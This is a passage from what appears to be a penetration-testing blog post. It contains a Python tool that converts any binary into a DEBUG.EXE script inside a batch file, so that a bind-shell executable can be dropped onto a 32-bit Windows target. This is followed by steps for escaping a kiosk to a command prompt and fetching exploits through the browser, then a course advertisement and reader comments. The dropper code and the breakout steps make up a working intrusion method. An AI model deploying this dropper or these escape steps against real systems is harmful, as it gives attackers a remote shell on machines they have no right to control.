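        raise ValueError(f"need 1..{MAX_SIZE} bytes, got {len(data)}")
    if tmp_name.lower().endswith((".exe", ".hex")):
        raise ValueError("DEBUG will not write .exe/.hex files; use a neutral name and copy it")
    lines = [f"n {tmp_name}"]
    for off in range(0, len(data), per_line):
        chunk = data[off:off + per_line]
        # 'e <addr> <bytes>' enters bytes at addr.  The post packs 128 per
        # line; 16 keeps each line short and easy to diff against a hex dump.
        lines.append(f"e {0x100 + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    lines += ["r cx", f"{len(data):04x}", "w", "q"]   # set length in CX, write, quit
    return "\r\n".join(lines) + "\r\n"


def parse_debug_script(script: str) -> bytes:
    """Inverse of make_debug_script.  Accepts both 'e addr b1 b2 ...' and the
    post's layout where 'e addr' is followed by the bytes on the next line,
    and honours the 'r cx' length so anything past it is dropped."""
    buf = bytearray()
    length = None
    lines = iter(script.splitlines())
    for line in lines:
        tokens = line.split()
        if not tokens:
            continue
        cmd = tokens[0].lower()
        if cmd == "e":
            addr = int(tokens[1], 16)
            values = tokens[2:] or next(lines).split()
            off = addr - 0x100
            if off < 0:
                raise ValueError(f"offset {addr:04x} is below CS:0100")
            buf.extend(b"\0" * (off + len(values) - len(buf)))  # grow if needed
            buf[off:off + len(values)] = bytes(int(v, 16) for v in values)
        elif cmd == "r" and len(tokens) > 1 and tokens[1].lower() == "cx":
            length = int(next(lines).split()[0], 16)   # value typed at the ':' prompt
        elif cmd == "q":
            break
    return bytes(buf[:length] if length is not None else buf)


def to_batch(script: str, hexfile: str, tmp_name: str, out_name: str) -> str:
    """Wrap the script in the post's 'echo line >>file' idiom so the whole drop
    is one .bat.  The space before > matters: with 'echo 0477>>x' cmd can take
    the 7 as a file handle and redirect that instead of echoing the text."""
    out = ["@echo off"]
    for i, line in enumerate(script.splitlines()):
        out.append(f"echo {line} {'>' if i == 0 else '>>'}{hexfile}")
    out.append(f"debug<{hexfile} && copy {tmp_name} {out_name} && del {tmp_name} && del {hexfile}")
    return "\r\n".join(out) + "\r\n"


if __name__ == "__main__":
    import sys
    payload = open(sys.argv[1], "rb").read()   # e.g. a small bind shell binary
    print(to_batch(make_debug_script(payload), "123.hex", "1.dll", "bind.exe"), end="")
```

Remember that this only buys you anything on 32-bit Windows, where debug.exe still exists; on a 64-bit box you need a different dropper (certutil, PowerShell, or a browser download, as the last section of this post suggests).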

 

 

 

 

Escaping and getting a command prompt

 

First things first, we need a command prompt before we can do anything else.  Let’s navigate to the task manager using Ctrl+Alt+Delete.  Next, go to File > New Task (Run…) and type in cmd.exe.  That will spawn a new command prompt (also if there is no physical keyboard present, you can start a new task and type in “osk.exe” for an onscreen keyboard):

image026

 

Here is an image of the On-Screen Keyboard:

image027

 

Next, use Internet Explorer (or whatever browser they have installed, but there is a good chance it is IE) to navigate to a website that hosts your favorite tools and exploits. Whew…well alrighty then... I hope that you enjoyed this blog post.

I'd love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

 

Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.

 


 

Happy Hacking

CEO/Founder at Strategic Security "I love helping people, I love my family, I love basketball, I love teaching, and you all know that I love rum and coke."  

2 Responses

  1. John Pickering
    Great post! Always really useful in this arena to learn some step-by-step exploits versus the hypothetical information we always seem to get. Had a chance to take your pen testing class. It was the first iteration and I am looking to take it again, as there were many problems with the first run, but I love that you are willing to share info! Keep it going! Thanks!
  2. Ahmed Sadat
    Great post, looking forward to the follow up.
